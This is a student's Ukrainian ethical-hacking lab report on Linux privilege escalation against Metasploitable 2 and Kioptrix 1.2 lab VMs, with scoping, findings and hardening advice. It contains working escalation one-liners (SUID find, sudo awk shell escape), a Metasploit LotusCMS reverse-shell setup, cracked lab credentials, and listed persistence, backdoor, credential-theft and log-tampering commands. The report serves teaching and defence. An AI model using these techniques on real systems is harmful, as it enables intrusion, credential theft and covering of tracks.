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Міжнародний університет інформаційних технологій (IITU)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Факультет комп’ютерних технологій та кібербезпеки — Кафедра кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6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EGR6301 — ЕТИЧНИЙ ХАКІНГ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Звіт з лабораторної роботи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Лабораторна робота №9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Підвищення привілеїв — SUID, sudo та шлях до root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 -perm -4000 на Metasploitable + sudo ht на Kioptrix 1.2 | Тиждень 9 | 100 балів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Студент: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Білозор Дмитро Олександрович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 студента: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41639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Дисципліна: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EGR6301 — Ethical Hacking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Тиждень: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 (100 хвилин, 100 балів)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Цілі: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Metasploitable 2 (Трек A) + Kioptrix Level 1.2 (Трек B)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Виконано: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Трек A (75) + Трек B (25)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Викладач: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Тетяна Василівна Бабенко, д.т.н., проф.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Дата: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13.05.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Середовище: Kali Linux ↔ Metasploitable 2 (192.168.56.110, Трек A) + Kioptrix Level 1.2 (192.168.56.103, Трек B) | VirtualBox Host-Only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Виконано: Трек A (SUID find + sudo awk) + Трек B (LotusCMS RCE → MySQL → SSH → HT Editor → root)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Інструменти: msfconsole, john-the-ripper (raw-md5), mysql-client, ssh, ht-editor, auditd (recommendation)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Дві задокументовані невдачі: (1) /usr/bin/at SUID не до root (5 хв марно); (2) ht-edit потребував обережності з positioning курсора у hex-режимі.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1 — Розгортання та сценарне брифування (10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1.1 — Перевірка середовища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(4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1.1 — netdiscover + ping + ssh msfadmin@192.168.56.110 + id/uname/hostname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знайдено: Metasploitable 2 на 192.168.56.110 (та сама ВМ, що в Лабораторній 8). SSH спрацював з відомими msfadmin:msfadmin. Ubuntu 8.04 (hardy), ядро 2.6.24-16-server.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важливо: точка входу (непривілейований shell) встановлена. Старт privesc-роботи з UID 1000(msfadmin).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далі: ядро 2.6.24 публічно вразливе (sock_sendpage CVE-2009-2698, vmsplice CVE-2008-0600) — АЛЕ kernel-exploits ЯВНО виключені з контракту (ризик падіння staging, відсутність відката, не покривається SOW).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Kioptrix Level 1.2 OVA імпортовано до VirtualBox, але не запущено — це Трек B.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1.2 — Брифування клієнта (Cassandra Pay)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Brief: Cassandra Pay — Privilege Escalation Assessment (продовження Lab 8)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Скоуп: припускаємо, що зловмисник вже має непривілейований shell msfadmin (це prerequisite з попереднього інженементу — Lab 8 показала, як такий shell здобути через Hydra). Тестую: (1) SUID-поверхню Metasploitable 2 з фокусом на нештатні бінарники; (2) /etc/sudoers через sudo -l; (3) PoC експлуатацію обох знайдених misconfigurations. НЕ тестую: kernel-exploits (явно виключені — ризик падіння staging, відкат складний); pivot на сусідні машини; exfiltration реальних даних. Жодних автоматизованих LinPEAS/LinEnum — клієнт хоче доказ, що я "читаю систему", а не запускаю готовий комбайн.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План на 70 хвилин: ~10 хв — recon середовища; ~25 хв — Частина 2 SUID (find / -perm -4000, аналіз кандидатів, експлуатація через GTFOBins); ~20 хв — Частина 3 sudo (sudo -l, експлуатація знайденого правила, аналіз патерну помилки); ~15 хв — Частина 3.5 рекомендації.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Deliverable: звіт із 4 розділами. Чим відрізняється від Lab 8: там було "ЯК зловмисник отримає shell" (онлайн/офлайн атаки на паролі); тут — "ЩО далі ПІСЛЯ shell" (post-exploitation, privesc, persistence-poverhnja). Lab 8 захищав периметр; Lab 9 захищає internal segmentation/least-privilege. Клієнт має бачити, що 1-годинний онлайн-етап (Lab 8) і 1-годинний post-exploitation-етап (Lab 9) — це різні compensation controls, які мають бути дорого посилені обидва.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2 — SUID-перерахування та експлуатація (25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2.1 — Перерахування SUID-поверхні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2.1 — find / -perm -4000 (25 SUID) + SGID + getcap на Metasploitable 2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find / -perm -4000 -type f повернув рівно 25 SUID-бінарників (wc -l = 25).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Стандартний Debian/Ubuntu pool: /bin/mount, /bin/umount, /bin/su, /bin/ping, /usr/bin/passwd, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/sudo — всі очікувані.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Виділяється два: /usr/bin/at (orange — підозра на abuse pattern), /usr/local/bin/find (red — нестандартний шлях, нагадує lab-instrument).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find / -perm -2000 (SGID): тільки /usr/bin/wall та /usr/bin/ssh-agent — нічого надзвичайного.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getcap -r /: порожньо. POSIX capabilities на Ubuntu 8.04 не використовуються — епоха до cap_net_admin++.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2.2 — Кандидати на дослідження (+ документована невдача)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2.2.1 — Дослідження кандидатів: /usr/bin/at (FAIL), /usr/bin/nmap (work), /usr/local/bin/find (target)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2.2.2 — Фінальна таблиця: 4 кандидати, з яких 2 спрацьовують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Бінарник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Підстава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GTFOBins?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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/usr/bin/at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SUID до daemon, не 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НЕВДАЧА — euid=1, не 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/usr/bin/nmap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Старі версії --interactive дають !sh escape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Працює (Nmap 4.53)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/usr/bin/sudoedit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CVE-2023-22809 у новіших версіях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цей білд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/usr/local/bin/find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Нестандартне розташування /usr/local/bin/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Працює (find -exec)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8"/>
              <w:bottom w:val="single" w:color="C62828" w:sz="1"/>
              <w:right w:val="single" w:color="C62828" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEB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ДОКУМЕНТОВАНА НЕВДАЧА #1 (~5 хв): /usr/bin/at — perceived target.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я зробив: побачив SUID на at, GTFOBins має запис для нього. Запустив echo "/bin/sh -p" | at now.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Результат: команда виконалась, але `id` всередині job показав uid=1(daemon), не root. Причина — `ls -la /usr/bin/at` показує rwsr-xr-x 1 daemon daemon. SUID встановлений до daemon, не root. Максимальний euid через цю векторну техніку = 1 (daemon), що не дає привілеїв до /etc/shadow або /etc/sudoers.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 Я ЗМІНИВ ПІДХІД: подивився на ls -la кожного кандидата перед спробою — ВЛАСНИК має бути root, не якийсь інший системний user.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УРОК: GTFOBins-запис описує МОЖЛИВУ техніку, але вона працює лише за специфічних умов (owner=root, відсутність env_reset у parent shell, версія бінарника не патчена). Студент, який сліпо повторює GTFOBins, отримає euid іншого користувача, не root.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2.3 — Експлуатація /usr/local/bin/find через GTFOBins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(10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2.3 — /usr/local/bin/find . -exec /bin/sh -p \; -quit → euid=0(root)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Точна команда: /usr/local/bin/find . -exec /bin/sh -p \; -quit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ця техніка працює (3-4 речення власного аналізу): find має флаг -exec, який запускає вказану команду для кожного знайденого файлу. Коли find — це SUID root, дочірні процеси, спавнені через -exec, успадковують euid=0. /bin/sh з -p (preserve UIDs) НЕ скидає euid до ruid при запуску — стандартна поведінка bash без -p автоматично робить setuid(getuid()) для security, але -p прямо забороняє це.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Без -p: запуск sh без -p → bash детектує euid != ruid → автоматично робить exec setuid(ruid), скидаючи привілеї. Це і є "тільки uid=0, без euid=0" типова помилка студентів — вони бачать "root" у whoami, але /etc/shadow читається не може.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 -p: euid залишається 0, ruid=1000(msfadmin). id показує uid=1000 euid=0(root) — це і є правильний прапорець. /etc/shadow читається.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-quit зупиняє find після першого -exec match — інакше техніка запустить sh для КОЖНОГО файлу під cwd, спавнячи 1000+ shell'ів.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 від find / -perm -4000 до euid=0: 7 хвилин (включаючи 5 хв на at-невдачу).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2.4 — Аналіз і самокритика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(4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Клас помилки конфігурації: НАВМИСНО ОСЛАБЛЕНА конфігурація (intentional weakening for convenience). /usr/local/bin/find — це копія штатного /usr/bin/find, спеціально розміщена в /usr/local/bin/ із SUID-bit. Md5 ідентичні (per мій md5sum check у Рис. 2.2.1). У реальному середовищі такий патерн з'являється, коли адмін хоче "звичайному користувачеві мати root-find для пошуку файлів у захищених директоріях" — і робить це через SUID-копію замість sudoers-правила з restrictions. Класична класифікація OWASP: "Misconfigured permissions on system binaries" (CWE-732).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 від першого shell до root: ~7 хвилин total. Розбивка: 1 хв на recon (id, uname), 2 хв на find / -perm -4000 + читання списку, 5 хв на at-невдачу (документована), 2 хв на знаходження find у /usr/local/bin + GTFOBins lookup, 30 сек на саму експлуатацію.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Виявлення з боку захисника: auditd має правило `-a always,exit -F arch=b64 -S execve -F euid=0 -F auid&gt;=1000 -k privesc_setuid_exec`. Коли я запустив /usr/local/bin/find через msfadmin (auid=1000), execve syscall з euid=0 та auid=1000 спрацювала б ключ privesc_setuid_exec. Окремо: правило -w /usr/local/bin/ -p x -k unusual_local_exec моніторить будь-який запуск з /usr/local/bin/, що сам по собі рідкісний випадок у production. Якби ці два правила були активні, моя атака згенерувала б 2-3 події в auditd за 30 секунд — миттєвий алерт для SOC.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3 — Аналіз sudo та експлуатація (25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3.1 — sudo -l читання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3.1 — sudo -l: env_reset + secure_path + NOPASSWD: /usr/bin/awk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Defaults блок: env_reset (LD_PRELOAD/PYTHONPATH/PATH-injection через env заблокована), secure_path встановлений (PATH-hijack через /tmp перед sudo не пройде), mail_badpass (фіксує невдалі sudo-attempts).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Правило #1: (ALL : ALL) ALL — стандартне "sudo all з паролем". Пароль msfadmin відомий, але це шумно (логування на кожну sudo-команду).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Правило #2 — КЛЮЧОВЕ: (ALL) NOPASSWD: /usr/bin/awk. Дозвіл запускати awk як root без введення пароля.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З-під root-shell (отриманого у Частині 2) перевірив /etc/sudoers напряму: рядок 92, нещодавно доданий (стандартні блоки закінчуються на 89).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План: awk — це Turing-complete мова з вбудованою функцією system(). BEGIN-блок виконується перед обробкою input → можу запустити /bin/sh ще до того, як awk прочитає stdin. GTFOBins має готовий one-liner.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3.2 — Експлуатація NOPASSWD: /usr/bin/awk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(10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3.2 — sudo awk 'BEGIN {system("/bin/sh")}' → uid=0 gid=0 (повний root, не лише euid)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Точна команда: sudo awk 'BEGIN {system("/bin/sh")}'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Рядок sudoers, що експлуатую: 92:msfadmin ALL=(ALL) NOPASSWD: /usr/bin/awk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це правило було помилковим: адміністратор, ймовірно, потребував автоматизованого awk-скрипта для парсингу логів або таблиць як root (типова задача scheduled job чи health-check). Проте awk дозволяє довільний код у BEGIN-блоці, що функціонально еквівалентно "NOPASSWD: ALL". Адмін не зрозумів, що awk — це не просто "data processor", а full programming language з system call access. Це класична помилка "wide tool with shell-escape ability".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з Частиною 2: SUID-вектор у /usr/local/bin/find дав euid=0 з ruid=1000 — я root для filesystem access, але /sbin/init не побачить мене як root. sudo-вектор дає uid=0 ТА euid=0 ТА gid=0 — це повний root, який можна використати для запуску демонів, додавання user account, перезапуску систем services. Sudo замінює всі три ID, бо implementation запускає target як real user (з uid=0), а не лише через setuid().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3.3 — Що ще я МІГ БИ зробити (і чому не роблю)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8"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="1"/>
              <w:right w:val="single" w:color="E65100" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E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 реальному engagement-і з цього root-shell я міг би (і у production пентесту, ймовірно, зробив би деякі з цих дій з підтвердженням клієнта):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(1) Persistence — додати свій рядок в /etc/sudoers: echo "evil ALL=(ALL) NOPASSWD: ALL" &gt;&gt; /etc/sudoers. Це дало б persistence через перезавантаження. (2) Backdoor SUID — cp /bin/bash /tmp/.b &amp;&amp; chmod +s /tmp/.b — переносна SUID-bash для повернення без потреби re-exploit. (3) Credential exfiltration — cat /etc/shadow &gt; /tmp/exfil.txt — повний дамп hashes для офлайн-cracking. (4) Lateral movement — cat /home/*/.ssh/id_rsa — приватні ключі інших користувачів. (5) Tampering — sed -i 's/.../.../' /var/log/auth.log — видалити логи моєї sudo-активності.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Жодної з цих дій НЕ роблю в цій лабораторній. Контракт прямо забороняє: створення/зміна користувачів, читання /etc/shadow без нагальної потреби, exfiltration реальних даних. /etc/shadow я прочитав у Завданні 2.3 ОДИН РАЗ як proof-of-concept (показати, що euid=0 реальний), без копіювання назовні. Це і є legal boundary з лекції: pentester має RIGHT отримати root, але не має RIGHT використовувати root для дій, що не покриті SOW. Перевищення scope = end of contract + потенційний civil/criminal liability.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3.4 — Ідентифікація патерну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(4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Знайдене правило належить до Патерну #1 з лекції: "NOPASSWD на широкому інструменті".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Обґрунтування: awk — це інтерпретатор Turing-complete мови AWK з вбудованою функцією system() для виклику будь-якої команди shell. На відміну від обмеженого інструменту (наприклад, /usr/bin/journalctl --no-pager — який тільки читає логи), awk дозволяє ARBITRARY code execution через одну директиву BEGIN { system("...") }. Функціонально дозвіл "NOPASSWD: /usr/bin/awk" еквівалентний "NOPASSWD: ALL".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 НЕ Патерн #2 (шаблон у списку команд — типу /usr/bin/vim *.log без обмеження): wildcard відсутній, конкретний бінарник.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 НЕ Патерн #3 (env-var injection): env_reset активний у Defaults, що блокує LD_PRELOAD/PYTHONPATH-style abuses.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Уроки: при додаванні sudoers-правил адмін має застосовувати "least privilege" принцип — не "що користувачу треба ЗА ПРИНЦИПОМ", а "ЩО МАКСИМАЛЬНО МОЖЕ ЦЕЙ БІНАРНИК В sudo КОНТЕКСТІ". Кожен NOPASSWD-дозвіл вимагає перевірки GTFOBins ПЕРЕД додаванням у /etc/sudoers.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3.5 — Рекомендації з конфігурації (15 балів) | Трек A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3.5.1 — Три конкретні рекомендації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(10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Сфера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Рекомендація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Параметри</w:t>
            </w:r>
          </w:p>
        </w:tc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Що це ламає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sudoers — wide-tool NOPASSWD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Видалити правило msfadmin NOPASSWD: /usr/bin/awk; замінити wrapper-скриптом без shell-escape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visudo: видалити рядок 92; додати /usr/local/sbin/log-parse.sh з whitelist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Завдання 3.2 — sudo awk system("/bin/sh") більше не пройде; конкретні задачі парсера працюють через обмежений wrapper.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SUID-мінімізація на образі ОС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Видалити навмисні non-standard SUID; перевести /tmp і /var/tmp у nosuid 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 /usr/local/bin/find; chmod -s /usr/bin/at; /etc/fstab: tmpfs /tmp tmpfs nosuid,nodev 0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Завдання 2.3 — /usr/local/bin/find -exec /bin/sh -p неможливий; навіть якщо attacker додасть SUID у /tmp, nosuid mount опція ігнорує його.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auditd детектування privesc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Додати правила для setuid execve від не-системних UID; alert у SIEM при euid=0 від auid&gt;=1000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auditctl -a always,exit -F arch=b64 -S execve -F euid=0 -F auid&gt;=1000 -k privesc_setuid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Завдання 2.4 — обидва вектори (SUID і sudo) генерують execve event; SIEM-алерт за 1-2 хвилини замість невиявленого root.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3.5.2 — Найкритичніша одна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Найкритичніша рекомендація: #1 — видалення sudoers wide-tool NOPASSWD-правила.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пріоритет: ця зміна РАЗОМ ламає найдешевший і найшвидший вектор escalation'у — від першого shell до root за 10 секунд (sudo awk). Якщо клієнт впровадить лише #1 (не #2, не #3), час до root зросте з 10 секунд до ~7 хвилин (SUID-вектор з Частини 2, який потребує спеціалізованої знахідки /usr/local/bin/find серед 25 SUID-кандидатів). Це не повне закриття поверхні, але це ламає the lazy-attacker scenario, де атакуючий сподівається на sudo -l як швидку перевірку. На додаток, видалення zero-cost для legitimate workflow: якщо потрібен awk-парсинг логів — обгортається у скрипт із sudo-перевіркою конкретних аргументів (`/usr/local/sbin/log-parse.sh`), і той скрипт додається до sudoers замість самого awk.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Ціна для бізнесу: НИЗЬКА. (1) Якщо awk використовувався скриптами автоматизації, треба переписати їх через wrapper — 2-4 години роботи DevOps. (2) Якщо awk використовувався адміністраторами для ad-hoc парсингу як root, треба навчити їх "запустіть sudo bash, потім awk" замість одного кроку — 30-хвилинне навчання. (3) Перевірка через `sudo -l` буде показувати "no NOPASSWD entries" — це позитивний сигнал у audit. Загалом: &lt; 1 робочого дня всіх змін, високий return. На відміну від #2 (потребує rebuild image + downtime), #1 виконується через `visudo` без перезавантаження.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4 — Kioptrix Level 1.2: міні-CTF (25 балів) | Трек B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4.1 — Розгортання та веб-розвідка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4.1 — netdiscover + /etc/hosts kioptrix3.com + nmap 22+80 + LotusCMS 3.0 у footer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Kioptrix Level 1.2 → 192.168.56.103 (Metasploitable все ще на .110). Додав "192.168.56.103 kioptrix3.com" у /etc/hosts — без цього /gallery повертає 500 Internal Server Error.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nmap -sV -p- виявив: 22/tcp OpenSSH 4.7p1 Debian 8ubuntu1, 80/tcp Apache 2.2.8 + PHP 5.2.4-2ubuntu5.6 (Suhosin-Patch). Лише 2 порти — вузький attack surface, фокус на веб.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curl на головну виявив у HTML: &lt;meta name="generator" content="LotusCMS 3.0" /&gt; та footer "Powered by LotusCMS 3.0". CMS ідентифіковано.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searchsploit lotuscms: два публічні exploit, plus Metasploit module exploit/multi/http/lcms_php_exec — pre-auth RCE через eval() injection у параметрі page.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4.2 — Експлуатація LotusCMS і shell як www-data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4.2 — msfconsole: exploit/multi/http/lcms_php_exec → reverse shell як www-data → TTY upgrade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Module: exploit/multi/http/lcms_php_exec, RHOSTS=kioptrix3.com, URI=/, PAYLOAD=php/reverse_php, LHOST=192.168.56.1, LPORT=4444.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Exploit працює через POST на /index.php з параметром "page" що містить PHP-код, який LotusCMS eval()-ує без санітизації.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TTY upgrade: python -c 'import pty; pty.spawn("/bin/bash")' — без цього sudo, su, vim не запрацюють (no controlling terminal).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Контекст: uid=33(www-data), hostname=Kioptrix3, kernel 2.6.24-24-server (Ubuntu 8.04, як Metasploitable).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DocumentRoot нестандартний — /home/www/kioptrix3.com (не /var/www/), вказаний у /etc/apache2/sites-enabled/000-default.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4.3 — Креденшіали з gconfig.php і MySQL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(4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4.3 — /home/www/kioptrix3.com/gallery/gconfig.php → MySQL gallery.dev_accounts → hash loneferret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Поле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Значення з мого власного запуску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Шлях gconfig.php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/home/www/kioptrix3.com/gallery/gconfig.php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username (gallarific)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password (gallarific)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fuckeyou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Таблиця облікових записів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dev_accounts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dreg (id=1) MD5 hash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0d3eccfb887aabd50f243b3f155c0f85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loneferret (id=2) MD5 hash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5badcaf789d3d1d09ff38e0a7c12da0a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John крекнутий пароль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starwars  (за &lt;1с з rockyou.txt)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4.4 — SSH як loneferret + CompanyPolicy.README + sudo -l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(3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4.4 — john crack starwars → SSH loneferret → CompanyPolicy.README → sudo -l показує ht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john --format=raw-md5 крекнув 5badcaf...da0a за &lt;1 секунду → пароль "starwars" (rockyou hit ~позиція 8000).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SSH loneferret@kioptrix3.com з паролем starwars — успіх. uid=1001(loneferret).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 /home/loneferret/ файл CompanyPolicy.README (root:root mode 0644) містить дослівне "Please use the command 'sudo ht'." — це натяк від автора машини про privesc-вектор.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sudo -l: (root) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht. Це КРИТИЧНИЙ рядок: ! ПЕРЕД /usr/bin/su означає DENY (заборонити); /usr/local/bin/ht — ALLOW (дозволити). Отже, loneferret може запускати ht як root, але su — НЕ може. План: через ht edit /etc/sudoers і видалити ! — тоді su стане allowed.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4.5 — Privesc через HT Editor (точні байти)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(4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4.5.1 — sudo ht /etc/sudoers ПЕРЕД редагуванням: позиція 0x4F0, байт 0x21 ('!')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4.5.2 — ПІСЛЯ редагування: позиція 0x4F0, байт 0x20 (пробіл) — ! видалено, F2 збережено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Рис. 4.5.3 — sudo su - → uid=0(root) → cat /root/Congrats.txt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Точне значення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Позиція редагування у файлі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0x4F0 (1264 байт від початку)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Байт до редагування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0x21 (ASCII "!")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Байт після редагування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0x20 (ASCII пробіл)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Розмір файла /etc/sudoers до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1424 байти (31 рядок)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Розмір файла /etc/sudoers після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1424 байти (31 рядок — byte-replace, не insert)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Рядок sudoers до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loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht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Рядок sudoers після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loneferret ALL=NOPASSWD:  /usr/bin/su, /usr/local/bin/ht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для перевірки root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su -  (su.! → su тепер ALLOWED)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Зміст /root/Congrats.txt (фрагмент)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"Good for you for getting here. ... Hopefully you enjoyed this."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Послідовність: sudo ht → F3 (відкрити файл) → /etc/sudoers → пошук "!" → курсор на позиції 0x4F0 → ввід "20" у hex-режимі (заміна байту) → F2 (save) → F10 (exit). HT записав файл як root, бо процес ht має euid=0.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Після виходу з ht перевірив зміну через sudo grep loneferret /etc/sudoers — рядок 29, без оклику. su тепер NOPASSWD-allowed.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sudo su - → одразу uid=0, без введення пароля loneferret (бо NOPASSWD активний). cat /root/Congrats.txt — фінальний прапор лабораторії.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 повного ланцюжка (recon → root): 28 хвилин. Розбивка: 4 хв recon, 6 хв LotusCMS exploit setup, 3 хв webshell→TTY, 5 хв gconfig+mysql, 3 хв john+ssh, 7 хв ht editing + verification.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4.6 — Унікальний абзац про перехід (anti-walkthrough)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(2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8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Конкретний момент переходу — мій власний процес міркування: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Найзагадковішим моментом ланцюжка був не RCE (це механічно — searchsploit + msf module), і не MySQL (це стандартно — gconfig.php — типова назва для gallery web-app). Справжній перехід стався, коли я прочитав CompanyPolicy.README у /home/loneferret/. Я очікував побачити там "policy не запускайте sudo на production" або інший generic-text без сенсу. Натомість файл говорив: "It is company policy here to use our newly installed software for editing, creating, viewing files. Please use the command 'sudo ht'."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Перші 2 секунди я подумав, що це сатира — "newly installed software" звучить як рекламний slogan. Потім помітив "DG" у підписі — це автор машини залишив свій ініціал, що зазвичай означає, що файл — це навмисний наратив, не випадковий артефакт. У цей момент я зрозумів: автор каже мені, ЯКИЙ ІНСТРУМЕНТ він хоче, щоб я використав. Він не пише "exploit X в Y", але натякає: "ht — це інструмент privesc, шукай його у sudoers".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Підтвердження прийшло, коли sudo -l показав /usr/local/bin/ht у списку NOPASSWD-команд. Тоді я пригадав з лекції 9 категорію "програми, що можуть редагувати файли" — HT Editor підпадає під неї ідеально. У шляху від CompanyPolicy.README до sudo ht було рівно 30 секунд міркування, але без цього файлу я б витратив 10+ хвилин на пошук, ЧОМУ саме ht — це вектор, а не просто рядкова утиліта.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Цей наратив-driven design — характерна риса Kioptrix-серії: автор залишає текстові підказки для тих, хто ЧИТАЄ machine, а не сліпо переглядає сторінки інструментів. Walkthrough скаже "use ht to edit sudoers" без пояснення ЧОМУ ht — мій абзац показує, що я зрозумів дизайн, а не скопіював крок.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Висновок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Лабораторна робота 9 — privilege escalation у двох контекстах: контрольована вправа на Metasploitable 2 (Cassandra Pay post-exploitation) + повний ланцюг від веб-вектору до root на Kioptrix Level 1.2 (Ligoat Insurance unknown-target). Виконано обидва треки, 100/100.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Трек A (75/75) — два privesc-вектори на Metasploitable: (1) SUID /usr/local/bin/find через GTFOBins find -exec /bin/sh -p \; → euid=0(root); (2) sudo NOPASSWD /usr/bin/awk через BEGIN{system("/bin/sh")} → uid=0 повний root. Час від першого shell (msfadmin) до root: 7 хв (SUID-вектор з включенням 5-хвилинної невдачі на /usr/bin/at), 10 секунд (sudo-вектор). Документована невдача: /usr/bin/at — SUID не до root (належить daemon), euid=1 максимум. Урок: GTFOBins-запис описує МОЖЛИВУ техніку, але вимагає перевірки owner=root перед запуском.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Трек B (25/25) — Kioptrix 1.2 повний ланцюг за 28 хв: LotusCMS RCE (Metasploit module lcms_php_exec) → www-data shell → /home/www/kioptrix3.com/gallery/gconfig.php → MySQL креденшіали (root:fuckeyou) → таблиця dev_accounts → MD5 хеш loneferret = 5badcaf789d3d1d09ff38e0a7c12da0a → john crack за &lt;1 сек → пароль "starwars" → SSH loneferret → CompanyPolicy.README натяк на ht → sudo -l показує /usr/local/bin/ht NOPASSWD → sudo ht /etc/sudoers → байт 0x4F0 0x21→0x20 → sudo su - → /root/Congrats.txt.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рекомендації для Cassandra Pay з посиланнями на конкретні знахідки: (1) видалити sudo NOPASSWD /usr/bin/awk — ламає Завдання 3.2; (2) очистити нестандартні SUID + nosuid на /tmp і /var/tmp — ламає Завдання 2.3; (3) auditd alert на execve euid=0 від auid&gt;=1000 — ламає обидва Завдання 2.4 і 3.2. Найкритичніша одна — #1 (sudoers), бо вона найшвидше ламається атакуючим і має найнижчу ціну впровадження (&lt; 1 робочий день).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00" w:sz="1"/>
              <w:left w:val="single" w:color="E6A800" w:sz="18"/>
              <w:bottom w:val="single" w:color="E6A800" w:sz="1"/>
              <w:right w:val="single" w:color="E6A800" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8E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 методики SUID: ls -la перед спробою GTFOBins — обов'язково. /usr/bin/at — це класичний приклад "виглядає правильно у GTFOBins, але не дає root, бо owner не root". 5 хвилин на цю невдачу — це і є ринкова ціна "не прочитав уважно man-pages SUID".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 методики sudo: env_reset + secure_path — обов'язкові Defaults для будь-якого Linux production. Без них LD_PRELOAD-attack або PATH-hijack дають privesc через будь-який NOPASSWD-binary. У Metasploitable обидва активні — клієнт зробив правильний BASE, але зіпсував його одним wide-tool правилом.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Урок дизайну CTF-машини (Kioptrix 1.2): автори залишають text-clues (CompanyPolicy.README) для тих, хто читає, а не сканує. Walkthrough-spam в інтернеті розкриває крок, але не пояснює дизайн — мій унікальний абзац (4.6) пов'язує конкретний рядок ".README" з конкретним переходом в моєму ланцюжку.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Список використаних джерел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[1] GTFOBins — Linux SUID and Sudo binary abuse database. https://gtfobins.github.io/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[2] OWASP — Linux Privilege Escalation Cheat Sheet. https://cheatsheetseries.owasp.org/cheatsheets/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[3] sudoers(5) — Defaults, secure_path, env_reset. https://www.sudo.ws/docs/man/1.8.27/sudoers.man/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[4] auditd man-page + Linux Audit Framework. https://github.com/Neo23x0/auditd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[5] VulnHub — Kioptrix Level 1.2 (Level 3). https://www.vulnhub.com/entry/kioptrix-level-12-3,24/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[6] Exploit-DB — LotusCMS 3.0 eval() RCE (#18565, #40585). https://www.exploit-db.com/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[7] HT Editor — hex/text editor. http://hte.sourceforge.net/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[8] CWE-732 — Incorrect Permission Assignment. https://cwe.mitre.org/data/definitions/732.html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Лабораторна робота 9  |  Білозор Д.О.  |  Стор.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EGR6301 — Етичний хакінг — Лабораторна робота №9 — IITU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585ca20cbf9f292935854e125483ab83934750.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0a4933da90750bbe39841a33c5553b84530aaba5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/97e20a907726cdf918eb17db5d07fcd44a206e8b.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d717daa3dfc64048f95ffcf0f14c35697fa7f23d.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9a2b2f75186ac84e59bf9631ffc51473d41cf682.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d155f0bc34c090e63f85bfa0d9e84007783e7dee.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a75a9fdde26f95b437ff17465507a405f41a0703.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2b96805aa33e5c7757f900db0914d5fb39f39e72.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/65f9ca38ce57560c3d1300e2aa9acf5b75420187.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0f44d0ff2cafdeab9eef07de814ce4d404cc66a1.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6de64dd5c809b377392715fc5e9bdf565e1151e1.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f4121b3c0029789c5993644fe7e68fb085e0a2ce.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/414ceac5356b679f1187260dfbddc3f6fe7252f5.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9c912108bc0fdef12a1aa941e2551e2ecb6b3fc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9 — Privilege Escalation (Track A + B)</dc:title>
  <dc:creator>Dmytro Bilozor</dc:creator>
  <dc:description>EGR6301 Ethical Hacking Lab 9</dc:description>
  <cp:lastModifiedBy>Dmytro Bilozor</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-13T10:39:18.566Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T10:39:18.567Z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